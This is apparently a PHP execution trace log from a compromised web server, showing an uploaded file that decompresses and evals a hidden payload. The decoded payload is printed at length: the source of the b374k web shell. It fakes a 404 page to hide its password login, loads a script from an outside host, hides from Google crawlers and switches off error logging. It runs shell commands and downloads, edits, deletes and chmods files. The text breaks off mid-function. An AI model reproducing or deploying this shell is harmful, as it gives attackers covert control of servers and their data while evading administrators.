3	14	0	0.018553	634528	gzuncompress	0		/var/www/html/uploads/nasi.php(4) : eval()'d code	1	1	'x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2��\017����bq�-<"%\f���*�|���0C:'
3	14	1	0.021464	986816
3	14	R			'<?php \r\n\r\n/* (Web Shell b374k r3c0d3d by x\'1n73ct|default pass:" 1n73ction ") */ \r\n$auth_pass = "9c80a1eaca699e2fc6b994721f8703bc"; \r\n$color = "#00ff00"; \r\n$default_action = \'FilesMan\'; \r\n@define(\'SELF_PATH\', __FILE__); \r\nif( strpos($_SERVER[\'HTTP_USER_AGENT\'],\'Google\') !== false ) { \r\n    header(\'HTTP/1.0 404 Not Found\'); \r\n    exit; \r\n} \r\n@session_start(); \r\n@error_reporting(0); \r\n@ini_set(\'error_log\',NULL); \r\n@ini_set(\'log_errors\',0); \r\n@ini_set(\'max_executio'
3	15	0	0.026867	1962184	eval	1	'?><?php \r\n\r\n/* (Web Shell b374k r3c0d3d by x\'1n73ct|default pass:" 1n73ction ") */ \r\n$auth_pass = "9c80a1eaca699e2fc6b994721f8703bc"; \r\n$color = "#00ff00"; \r\n$default_action = \'FilesMan\'; \r\n@define(\'SELF_PATH\', __FILE__); \r\nif( strpos($_SERVER[\'HTTP_USER_AGENT\'],\'Google\') !== false ) { \r\n    header(\'HTTP/1.0 404 Not Found\'); \r\n    exit; \r\n} \r\n@session_start(); \r\n@error_reporting(0); \r\n@ini_set(\'error_log\',NULL); \r\n@ini_set(\'log_errors\',0); \r\n@ini_set(\'max_execution_time\',0);\r\n@ini_set(\'output_buffering\',0); \r\n@ini_set(\'display_errors\', 0);\r\n@set_time_limit(0); \r\n@set_magic_quotes_runtime(0); \r\n@define(\'VERSION\', \'2.1\'); \r\nif( get_magic_quotes_gpc() ) { \r\n    function stripslashes_array($array) { \r\n        return is_array($array) ? array_map(\'stripslashes_array\', $array) : stripslashes($array); \r\n    } \r\n    $_POST = stripslashes_array($_POST); \r\n} \r\nfunction printLogin() { \r\n    ?> \r\n<SCRIPT SRC=http://w0rms.com/sayac.js></SCRIPT>\r\n<h1>Not Found</h1> \r\n<p>The requested URL was not found on this server.</p> \r\n<hr> \r\n<address>Apache Server at <?=$_SERVER[\'HTTP_HOST\']?> Port 80</address> \r\n    <style> \r\n        input { margin:0;background-color:#fff;border:1px solid #fff; } \r\n    </style> \r\n    <center> \r\n    <form method=post> \r\n    <input type=password name=pass> \r\n    </form></center> \r\n    <?php \r\n    exit; \r\n} \r\nif( !isset( $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] )) \r\n    if( empty( $auth_pass ) || \r\n        ( isset( $_POST[\'pass\'] ) && ( md5($_POST[\'pass\']) == $auth_pass ) ) ) \r\n        $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] = true; \r\n    else \r\n        printLogin();\r\n\t\t\r\n@ini_set(\'log_errors\',0);\r\n@ini_set(\'output_buffering\',0);\t\r\nif(isset($_GET[\'dl\']) && ($_GET[\'dl\'] != "")){\r\n\t$file = $_GET[\'dl\'];\r\n\t$filez = @file_get_contents($file);\r\n   header("Content-type: application/octet-stream"); \r\n   header("Content-length: ".strlen($filez)); \r\n   header("Content-disposition: attachment; filename=\\"".basename($file)."\\";");\r\n   echo $filez; \r\n    exit; \r\n}\r\nelseif(isset($_GET[\'dlgzip\']) && ($_GET[\'dlgzip\'] != "")){\r\n\t$file = $_GET[\'dlgzip\'];\r\n\t$filez = gzencode(@file_get_contents($file));\r\n   header("Content-Type:application/x-gzip\\n"); \r\n   header("Content-length: ".strlen($filez)); \r\n   header("Content-disposition: attachment; filename=\\"".basename($file).".gz\\";");\r\n   echo $filez; \r\n    exit; \r\n}\r\n// view image\r\nif(isset($_GET[\'img\'])){\r\n\t\t@ob_clean(); \r\n\t\t$d = magicboom($_GET[\'y\']);\r\n\t\t$f = $_GET[\'img\'];\r\n\t\t$inf = @getimagesize($d.$f); \r\n   \t\t$ext = explode($f,"."); \r\n   \t\t$ext = $ext[count($ext)-1]; \r\n   \t \t@header("Content-type: ".$inf["mime"]);\r\n   \t \t@header("Cache-control: public"); \r\n  \t\t@header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); \r\n  \t\t@header("Cache-control: max-age=".(60*60*24*7));  \r\n   \t \t@readfile($d.$f); \r\n   \t \texit; \r\n}\r\n\r\n// server software\r\n$software = getenv("SERVER_SOFTWARE");\r\n// check safemode\r\nif (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")  $safemode = TRUE; else $safemode = FALSE;\r\n// uname -a\r\n$system = @php_uname();\r\n// mysql\r\nfunction showstat($stat) {if ($stat=="on") {return "<b><font style=\'color:#00FF00\'>ON</font></b>";}else {return "<b><font style=\'color:#DD4736\'>OFF</font></b>";}}\r\nfunction testmysql() {if (function_exists(\'mysql_connect\')) {return showstat("on");}else {return showstat("off");}}\r\nfunction testcurl() {if (function_exists(\'curl_version\')) {return showstat("on");}else {return showstat("off");}}\r\nfunction testwget() {if (exe(\'wget --help\')) {return showstat("on");}else {return showstat("off");}}\r\nfunction testperl() {if (exe(\'perl -h\')) {return showstat("on");}else {return showstat("off");}}\r\n// check os\r\nif(strtolower(substr($system,0,3)) == "win") $win = TRUE;\r\nelse $win = FALSE; \r\n// change directory\r\nif(isset($_GET[\'y\'])){\r\n\tif(@is_dir($_GET[\'view\'])){\r\n\t\t$pwd = $_GET[\'view\'];\r\n\t\t@chdir($pwd);\r\n\t}\r\n\telse{\r\n\t\t$pwd = $_GET[\'y\'];\r\n\t\t@chdir($pwd);\r\n\t}\r\n}\r\n//hdd\r\nfunction convertByte($s) {\r\nif($s >= 1073741824)\r\nreturn sprintf(\'%1.2f\',$s / 1073741824 ).\' GB\';\r\nelseif($s >= 1048576)\r\nreturn sprintf(\'%1.2f\',$s / 1048576 ) .\' MB\';\r\nelseif($s >= 1024)\r\nreturn sprintf(\'%1.2f\',$s / 1024 ) .\' KB\';\r\nelse\r\nreturn $s .\' B\';\r\n}\r\n\r\n// username, id, shell prompt and working directory\r\nif(!$win){\r\n\tif(!$user = rapih(exe("whoami"))) $user = "";\r\n\tif(!$id = rapih(exe("id"))) $id = "";\r\n\t$prompt = $user." \\$ ";\r\n\t$pwd = @getcwd().DIRECTORY_SEPARATOR;\r\n}\r\nelse {\r\n\t$user = @get_current_user();\r\n\t$id = $user;\r\n\t$prompt = $user." &gt;";\r\n\t$pwd = realpath(".")."\\\\";\r\n\t// find drive letters\r\n \t$v = explode("\\\\",$d); \r\n\t$v = $v[0]; \r\n \tforeach (range("A","Z") as $letter) \r\n \t{ \r\n\t  $bool = @is_dir($letter.":\\\\");\r\n\t  if ($bool) \r\n\t  { \r\n \t\t  $letters .= "<a href=\\"?y=".$letter.":\\\\\\">[ ";\r\n\t\t   if ($letter.":" != $v) {$letters .= $letter;} \r\n\t\t   else {$letters .= "<span class=\\"gaya\\">".$letter."</span>";} \r\n\t\t   $letters .= " ]</a> "; \r\n  \t  }\t \r\n } \r\n}\r\n\r\nfunction testoracle() {\r\n    if (function_exists(\'ocilogon\')) { return showstat("on"); }\r\n    else { return showstat("off"); }\r\n    }\r\n\r\nfunction testmssql() {\r\n    if (function_exists(\'mssql_connect\')) { return showstat("on"); }\r\n    else { return showstat("off"); }\r\n    }\r\n\r\n function showdisablefunctions() {\r\n    if ($disablefunc=@ini_get("disable_functions")){ return "<span style=\'color:\'><font color=#DD4736><b>".$disablefunc."</b></font></span>"; }\r\n    else { return "<span style=\'color:#00FF1E\'><b>NONE</b></span>"; }\r\n    }\r\n\t\r\nif(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;\r\nelse $posix = FALSE;\r\n// server ip\r\n$server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);\r\n// your ip ;-)\r\n$my_ip = $_SERVER[\'REMOTE_ADDR\'];\r\n$admin_id=$_SERVER[\'SERVER_ADMIN\'];\r\n$bindport = "13123";\r\n$bindport_pass = "b374k";\r\n\r\n// separate the working direcotory\r\n$pwds = explode(DIRECTORY_SEPARATOR,$pwd);\r\n$pwdurl = "";\r\nfor($i = 0 ; $i < sizeof($pwds)-1 ; $i++){\r\n\t$pathz = "";\r\n\tfor($j = 0 ; $j <= $i ; $j++){\r\n\t\t$pathz .= $pwds[$j].DIRECTORY_SEPARATOR;\r\n\t}\r\n\t$pwdurl .= "<a href=\\"?y=".$pathz."\\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>";\r\n}\r\n\t\r\n// rename file or folder\r\nif(isset($_POST[\'rename\'])){\r\n\t$old = $_POST[\'oldname\'];\r\n\t$new = $_POST[\'newname\'];\r\n\t@rename($pwd.$old,$pwd.$new);\r\n\t$file = $pwd.$new;\r\n}\r\nif(isset($_POST[\'chmod\'])){ \r\n\t$name = $_POST[\'name\'];\r\n\t$value = $_POST[\'newvalue\'];\r\nif (strlen($value)==3){\r\n\t$value = 0 . "" . $value;}\r\n\t@chmod($pwd.$name,octdec($value));\r\n\t$file = $pwd.$name;}\r\n\t\r\nif(isset($_POST[\'chmod_folder\'])){\r\n\t$name = $_POST[\'name\'];\r\n\t$value = $_POST[\'newvalue\'];\r\nif (strlen($value)==3){\r\n\t$value = 0 . "" . $value;}\r\n\t@chmod($pwd.$name,octdec($value));\r\n\t$file = $pwd.$name;}\r\n\r\n\r\n// print useful info\r\n$buff  = "Software : <b>".$software."</b><br />";\r\n$buff .= "System OS : <b>".$system."</b><br />";\r\nif($id != "") $buff .= "ID : <b>".$id."</b><br />";\r\n$buff .= "PHP Version : <b>".phpversion()."</b> on <b>".php_sapi_name()."</b><br />";\r\n$buff .= "Server ip : <b>".$server_ip."</b> <span class=\\"gaya\\"> | </span> Your   ip : <b>".$my_ip."</b><span class=\\"gaya\\"> | </span> Admin : <b>".$admin_id."</b><br />";\r\n$buff .= "Free Disk: "."<span style=\'color:#00FF1E\'><b>".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."</b></span><br />";\r\nif($safemode) $buff .= "Safemode: <span class=\\"gaya\\"><b>ON</b></span><br />";\r\nelse $buff .= "Safemode: <span class=\\"gaya\\"><b>OFF</b></span><br />";\r\n$buff .= "Disabled Functions: ".showdisablefunctions()."<br />";\r\n$buff .= "MySQL: ".testmysql()."&nbsp;|&nbsp;MSSQL: ".testmssql()."&nbsp;|&nbsp;Oracle: ".testoracle()."&nbsp;|&nbsp;Perl: ".testperl()."&nbsp;|&nbsp;cURL: ".testcurl()."&nbsp;|&nbsp;WGet: ".testwget()."<br>";\r\n$buff .= "<font color=00ff00 ><b>".$letters."&nbsp;&gt;&nbsp;".$pwdurl."</b></font>";\r\n\r\n\r\n\r\n\r\nfunction rapih($text){\r\n\treturn trim(str_replace("<br />","",$text));\r\n}\r\n\r\nfunction magicboom($text){\r\n\tif (!get_magic_quotes_gpc()) {\r\n   \t\t return $text;\r\n\t} \r\n\treturn stripslashes($text);\r\n}\r\n\r\nfunction showdir($pwd,$prompt){\r\n\t$fname = array();\r\n\t$dname = array();\r\n\tif(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;\r\n\telse $posix = FALSE;\r\n\t$user = "????:????";\r\n\tif($dh = @scandir($pwd)){\r\n\t\tforeach($dh as $file){\r\n\t\t\tif(is_dir($file)){\r\n\t\t\t\t$dname[] = $file;\r\n\t\t\t}\r\n\t\t\telseif(is_file($file)){\r\n\t\t\t\t$fname[] = $file;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\telse{\r\n\t\tif($dh = @opendir($pwd)){\r\n\t\t\twhile($file = @readdir($dh)){\r\n\t\t\t\tif(@is_dir($file)){\r\n\t\t\t\t\t$dname[] = $file;\r\n\t\t\t\t}\r\n\t\t\t\telseif(@is_file($file)){\r\n\t\t\t\t\t$fname[] = $file;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\t@closedir($dh);\r\n\t\t}\r\n\t}\r\n\r\n\t\r\n\tsort($fname);\r\n\tsort($dname);\r\n\t$path = @explode(DIRECTORY_SEPARATOR,$pwd);\r\n\t$tree = @sizeof($path);\r\n\t$parent = "";\r\n\t$buff = "\r\n\t<form action=\\"?y=".$pwd."&amp;x=shell\\" method=\\"post\\" style=\\"margin:8px 0 0 0;\\">\r\n\t<table class=\\"cmdbox\\" style=\\"width:50%;\\">\r\n\t<tr><td><b>$prompt</b></td><td><input onMouseOver=\\"this.focus();\\" id=\\"cmd\\" class=\\"inputz\\" type=\\"text\\" name=\\"cmd\\" style=\\"width:400px;\\" value=\\"\\" /><input class=\\"inputzbut\\" type=\\"submit\\" value=\\"Go !\\" name=\\"submitcmd\\" style=\\"width:80px;\\" /></td></tr>\r\n\t</form>\r\n\t<form action=\\"?\\" method=\\"get\\" style=\\"margin:8px 0 0 0;\\">\r\n\t<input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" />\r\n\t<tr><td><b>view file/folder</b></td><td><input onMouseOver=\\"this.focus();\\" id=\\"goto\\" class=\\"inputz\\" type=\\"text\\" name=\\"view\\" style=\\"width:400px;\\" value=\\"".$pwd."\\" /><input class=\\"inputzbut\\" type=\\"submit\\" value=\\"View !\\" name=\\"submitcmd\\" style=\\"width:80px;\\" /></td></tr>\r\n\t</form></table><table class=\\"explore\\">\r\n\t<tr><th>name</th><th style=\\"width:80px;\\">size</th><th style=\\"width:210px;\\">owner:group</th><th style=\\"width:80px;\\">perms</th><th style=\\"width:110px;\\">modified</th><th style=\\"width:190px;\\">actions</th></tr>\r\n\t";\r\n\tif($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;\r\n\telse $parent = $pwd;  \r\n\r\n\tforeach($dname as $folder){\r\n\t\tif($folder == ".") {\r\n\t\t\tif(!$win && $posix){\r\n\t\t\t\t$name=@posix_getpwuid(@fileowner($folder));\r\n\t\t\t\t$group=@posix_getgrgid(@filegroup($folder));\r\n\t\t\t\t$owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\'];\r\n\t\t\t}\r\n\t\t\telse {\r\n\t\t\t\t$owner = $user;\r\n\t\t\t}\r\n\t\t\t$buff .= "<tr><td><a href=\\"?y=".$pwd."\\">$folder</a></td><td>LINK</td>\r\n\t\t\t<td style=\\"text-align:center;\\">".$owner."</td><td><center>".get_perms($pwd)."</center></td>\r\n\t\t\t<td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\\"titik1\\">\r\n\t\t\t<a href=\\"?y=$pwd&amp;edit=".$pwd."newfile.php\\">newfile</a> | <a href=\\"javascript:tukar(\'titik1\',\'titik1_form\');\\">newfolder</a></span>\r\n\t\t\t<form action=\\"?\\" method=\\"get\\" id=\\"titik1_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\">\r\n\t\t\t<input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" />\r\n\t\t\t<input class=\\"inputz\\" style=\\"width:140px;\\" type=\\"text\\" name=\\"mkdir\\" value=\\"a_new_folder\\" />\r\n\t\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" style=\\"width:35px;\\" value=\\"Go !\\" />\r\n\t\t\t</form></td>\r\n\t\t\t\r\n\t\t\t</tr>\r\n\t\t\t";\r\n\t\t}\r\n\t\telseif($folder == "..") {\r\n\t\t\tif(!$win && $posix){\r\n\t\t\t\t$name=@posix_getpwuid(@fileowner($folder));\r\n\t\t\t\t$group=@posix_getgrgid(@filegroup($folder));\r\n\t\t\t\t$owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\'];\r\n\t\t\t}\r\n\t\t\telse {\r\n\t\t\t\t$owner = $user;\r\n\t\t\t}\r\n\t\t\t$buff .= "<tr><td><a href=\\"?y=".$parent."\\"><img src=\'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxUAM0qLz6wAAALLSURBVDjLbVPRS1NRGP+d3btrs7kZmAYXlSZYUK4HQXCREPWUQSSYID1GEKKx/Af25lM+DCFCe4heygcNdIUEST04QW6BjS0yx5UhkW6FEtvOPfc7p4emXcofHPg453y/73e+73cADyzLOoy/bHzR8/l80LbtYD5v6wf72VzOmwLmTe7u7oZlWccbGhpGNJ92HQwtteNvSqmXJOWjM52dPPMpg/Nd5/8SpFIp9Pf3w7KsS4FA4BljrB1HQCmVc4V7O3oh+mFlZQWxWAwskUggkUhgeXk5Fg6HF5mPnWCAAhhTUGCKQUF5eb4LIa729PRknr94/kfBwMDAsXg8/tHv958FoDxP88YeJTLd2xuLAYAPAIaGhu5IKc9yzsE5Z47jYHV19UOpVNoXQsC7OOdwHNG7tLR0EwD0UCis67p2nXMOACiXK7/ev3/3ZHJy8nEymZwyDMM8qExEyjTN9vr6+oAQ4gaAef3ixVgd584pw+DY3d0tTE9Pj6TT6TfBYJCPj4/fBuA/IBBC+GZmZhZbWlrOOY5jDg8Pa3qpVEKlUoHf70cgEGgeHR2NPHgQV4ODt9Ts7KwEQACgaRpSqVdQSrFqtYpqtSpt2wYDYExMTMy3tbVdk1LWpqXebm1t3TdN86mu65FaMw+sE2KM6T9//pgaGxsb1QE4a2trr5uamq55Gn2l+WRzWgihEVH9EX5AJpOZBwANAHK5XKGjo6OvsbHRdF0XRAQpZZ2U0k9EiogYEYGIlJSS2bY9m0wmHwJQWo301/b2diESiVw2jLoQETFyXeWSy4hc5rqHJKxYLGbn5ubuFovF0qECANjf37e/bmzkjDrjdCgUamU+MCIJIgkpiZXLZZnNZhcWFhbubW5ufu7q6sLOzs7/LgPQ3tra2h+NRvvC4fApAHJvb29rfX19qVAovAawd+Rv/Ac+AMcAGLUJVAA4R138DeF+cX+xR/AGAAAAAElFTkSuQmCC\'>   $folder</a></td><td>LINK</td>\r\n\t\t\t<td style=\\"text-align:center;\\">".$owner."</td>\r\n\t\t\t<td><center>".get_perms($parent)."</center></td><td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($parent))."</td>\r\n\t\t\t<td><span id=\\"titik2\\"><a href=\\"?y=$pwd&amp;edit=".$parent."newfile.php\\">newfile</a> | <a href=\\"javascript:tukar(\'titik2\',\'titik2_form\');\\">newfolder</a></span>\r\n\t\t\t<form action=\\"?\\" method=\\"get\\" id=\\"titik2_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\">\r\n\t\t\t<input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" />\r\n\t\t\t<input class=\\"inputz\\" style=\\"width:140px;\\" type=\\"text\\" name=\\"mkdir\\" value=\\"a_new_folder\\" />\r\n\t\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" style=\\"width:35px;\\" value=\\"Go !\\" />\r\n\t\t\t</form>\r\n\t\t\t</td></tr>";\r\n\t\t}\r\n\t\telse {\r\n\t\t\tif(!$win && $posix){\r\n\t\t\t\t$name=@posix_getpwuid(@fileowner($folder));\r\n\t\t\t\t$group=@posix_getgrgid(@filegroup($folder));\r\n\t\t\t\t$owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\'];\r\n\t\t\t}\r\n\t\t\telse {\r\n\t\t\t\t$owner = $user;\r\n\t\t\t}\r\n\t\t\t$buff .= "<tr><td><a id=\\"".clearspace($folder)."_link\\" href=\\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\\"><b><img src=\'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAQAAAC1+jfqAAAAAXNSR0IArs4c6QAAAAJiS0dEAP+Hj8y/AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA00lEQVQoz6WRvUpDURCEvzmuwR8s8gr2ETvtLSRaKj6ArZU+VVAEwSqvJIhIwiX33nPO2IgayK2cbtmZWT4W/iv9HeacA697NQRY281Fr0du1hJPt90D+xgc6fnwXjC79JWyQdiTfOrf4nk/jZf0cVenIpEQImGjQsVod2cryvH4TEZC30kLjME+KUdRl24ZDQBkryIvtOJggLGri+hbdXgd90e9++hz6rR5jYtzZKsIDzhwFDTQDzZEsTz8CRO5pmVqB240ucRbM7kejTcalBfvn195EV+EajF1hgAAAABJRU5ErkJggg==\' />     [ $folder ]</b></a>\r\n\t\t\t<form action=\\"?y=$pwd\\" method=\\"post\\" id=\\"".clearspace($folder)."_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\">\r\n\t\t\t<input type=\\"hidden\\" name=\\"oldname\\" value=\\"".$folder."\\" style=\\"margin:0;padding:0;\\" />\r\n\t\t\t<input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newname\\" value=\\"".$folder."\\" />\r\n\t\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" value=\\"rename\\" />\r\n\t\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".clearspace($folder)."_form\',\'".clearspace($folder)."_link\');\\" />\r\n\t\t\t</form><td>DIR</td><td style=\\"text-align:center;\\">".$owner."</td>\r\n\t\t\t<td><center>\r\n\t\t\t<a href=\\"javascript:tukar(\'".clearspace($folder)."_link\',\'".clearspace($folder)."_form3\');\\">".get_perms($pwd.$folder)."</a>\r\n\t\t\t<form action=\\"?y=$pwd\\" method=\\"post\\" id=\\"".clearspace($folder)."_form3\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> \r\n\t\t\t<input type=\\"hidden\\" name=\\"name\\" value=\\"".$folder."\\" style=\\"margin:0;padding:0;\\" /> \r\n\t\t\t<input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newvalue\\" value=\\"".substr(sprintf(\'%o\', fileperms($pwd.$folder)), -4)."\\" /> \r\n\t\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"chmod_folder\\" value=\\"chmod\\" /> \r\n\t\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" \r\n\t\t\tonclick=\\"tukar(\'".clearspace($folder)."_link\',\'".clearspace($folder)."_form3\');\\" /></form></center></td>\r\n\t\t\t<td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\\"javascript:tukar(\'".clearspace($folder)."_link\',\'".clearspace($folder)."_form\');\\">rename</a> | <a href=\\"?y=$pwd&amp;fdelete=".$pwd.$folder."\\">delete</a></td></tr>";\r\n\t\t}\r\n\t}\r\n\r\n\tforeach($fname as $file){\r\n\t\t$full = $pwd.$file;\r\n\t\tif(!$win && $posix){\r\n\t\t\t$name=@posix_getpwuid(@fileowner($folder));\r\n\t\t\t$group=@posix_getgrgid(@filegroup($folder));\r\n\t\t\t$owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\'];\r\n\t\t}\r\n\t\telse {\r\n\t\t\t$owner = $user;\r\n\t\t}\t\t\r\n\t\t$buff .= "<tr><td><a id=\\"".clearspace($file)."_link\\" href=\\"?y=$pwd&amp;view=$full\\"><b><img src=\'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=\' />   $file</b></a>\r\n\t\t<form action=\\"?y=$pwd\\" method=\\"post\\" id=\\"".clearspace($file)."_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\">\r\n\t\t<input type=\\"hidden\\" name=\\"oldname\\" value=\\"".$file."\\" style=\\"margin:0;padding:0;\\" />\r\n\t\t<input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newname\\" value=\\"".$file."\\" />\r\n\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" value=\\"rename\\" />\r\n\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".clearspace($file)."_link\',\'".clearspace($file)."_form\');\\" />\r\n\t\t</form></td><td>".ukuran($full)."</td><td style=\\"text-align:center;\\">".$owner."</td><td><center>\r\n\t\t<a href=\\"javascript:tukar(\'".clearspace($file)."_link\',\'".clearspace($file)."_form2\');\\">".get_perms($full)."</a>\r\n\t\t<form action=\\"?y=$pwd\\" method=\\"post\\" id=\\"".clearspace($file)."_form2\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> \r\n<input type=\\"hidden\\" name=\\"name\\" value=\\"".$file."\\" style=\\"margin:0;padding:0;\\" /> \r\n<input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newvalue\\" value=\\"".substr(sprintf(\'%o\', fileperms($full)), -4)."\\" /> \r\n<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"chmod\\" value=\\"chmod\\" /> \r\n<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".clearspace($file)."_link\',\'".clearspace($file)."_form2\');\\" /></form></center></td>\r\n\t\t<td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($full))."</td>\r\n\t\t<td><a href=\\"?y=$pwd&amp;edit=$full\\">edit</a> | <a href=\\"javascript:tukar(\'".clearspace($file)."_link\',\'".clearspace($file)."_form\');\\">rename</a> | <a href=\\"?y=$pwd&amp;delete=$full\\">delete</a> | <a href=\\"?y=$pwd&amp;dl=$full\\">download</a>&nbsp;(<a href=\\"?y=$pwd&amp;dlgzip=$full\\">gzip</a>)</td></tr>";\r\n\t}\r\n\t$buff .= "</table>";\r\n\treturn $buff;\r\n}\r\n\r\nfunction ukuran($file){\r\n\tif($size = @filesize($file)){\r\n\t\tif($size <= 1024) return $size;\r\n\t\telse{\r\n\t\t\tif($size <= 1024*1024) {\r\n\t\t\t\t$size = @round($size / 1024,2);;\r\n\t\t\t\treturn "$size kb";\r\n\t\t\t}\r\n\t\t\telse {\r\n\t\t\t\t$size = @round($size / 1024 / 1024,2);\r\n\t\t\t\treturn "$size mb";\t\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\telse return "???";\r\n}\r\n\r\nfunction exe($cmd){\r\n\tif(function_exists(\'system\')) {\r\n\t\t@ob_start();\r\n\t\t@system($cmd);\r\n\t\t$buff = @ob_get_contents();\r\n\t\t@ob_end_clean();\r\n\t\treturn $buff;\r\n\t}\r\n\telseif(function_exists(\'exec\')) {\r\n\t\t@exec($cmd,$results);\r\n\t\t$buff = "";\r\n\t\tforeach($results as $result){\r\n\t\t\t$buff .= $result;\r\n\t\t}\r\n\t\treturn $buff;\r\n\t}\r\n\telseif(function_exists(\'passthru\')) {\r\n\t\t@ob_start();\r\n\t\t@passthru($cmd);\r\n\t\t$buff = @ob_get_contents();\r\n\t\t@ob_end_clean();\r\n\t\treturn $buff;\r\n\t}\r\n\telseif(function_exists(\'shell_exec\')){\r\n\t\t$buff = @shell_exec($cmd);\r\n\t\treturn $buff;\r\n\t}\r\n}\r\n\r\nfunction tulis($file,$text){\r\n\t$textz = gzinflate(base64_decode($text));\r\n\t if($filez = @fopen($file,"w"))\r\n\t {\r\n\t\t @fputs($filez,$textz);\r\n\t\t @fclose($file);\r\n\t }\r\n}\r\n\r\nfunction ambil($link,$file) { \r\n   if($fp = @fopen($link,"r")){\r\n\t   while(!feof($fp)) { \r\n   \t\t    $cont.= 